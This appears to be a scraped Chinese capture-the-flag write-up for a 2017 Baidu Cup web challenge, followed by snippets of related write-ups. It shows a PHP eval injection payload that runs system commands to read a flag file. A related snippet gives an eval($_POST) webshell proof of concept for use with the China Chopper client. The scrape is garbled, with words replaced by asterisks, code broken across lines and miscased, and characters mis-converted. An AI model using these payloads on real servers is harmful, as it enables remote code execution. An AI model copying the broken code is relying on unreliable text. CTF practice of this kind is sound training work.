百度杯」CTF比賽 2017 二月場 爆破 2

2021-10-10 00:14:27 字數 643 閱讀 7423

進入環境還是進行**審計:

<?php 

include

"flag.php";$a

= @$_request

['hello'];

eval

("var_dump($a

);")

;show_source

(__file__

);

eval會將裡面的字串當作php**執行,第一反應就是利用$a在裡面執行**,不過一開始我沒有成功,我以為這樣不行,後來才知道問題。

我一開始是這樣的:

?hello=);

system

("ls"

);

真的有點粗心,首先就沒有注意到var_dump後面本來就有乙個;,而且我還有)沒有閉合。

這樣寫就可以了:

再用cat命令獲得flag.php,然後f12檢視原始碼就可以得到flag了。

百度杯2017 二月場 爆破二 三

include flag.php a request hello eval var dump a show source file 還是 審計 乙個乙個來看 flag.php hello的value設定為讀取檔案的函式,讓eval執行這段函式。fread 讀取指定檔案 可安全用於二進位制檔案 str...

「百度杯」CTF比賽 九月場 Test

個人收穫 1.連線shell 失敗的時候可以試試多個版本的菜刀,可能是菜刀的問題 2.學會了菜刀資料庫管理的配置 題目介面 有現成的poc search.php?searchtype 5 tid area eval post 1 菜刀鏈結,密碼為1我們用菜刀進行訪問 之前我用另乙個菜刀無法連線,開始...

「百度杯」CTF比賽 十月場 登入

這題的sql注入也確實是讓自己漲姿勢了。自己可以說學了mysql就沒有用過like,一直以為它在sql注入裡沒用,沒想到居然可以這樣。進入環境,是乙個登入頁面。嘗試進行sql注入,發現username為admin or 1 1 的時候顯示密碼錯誤,username為admin or 1 2 的時候顯...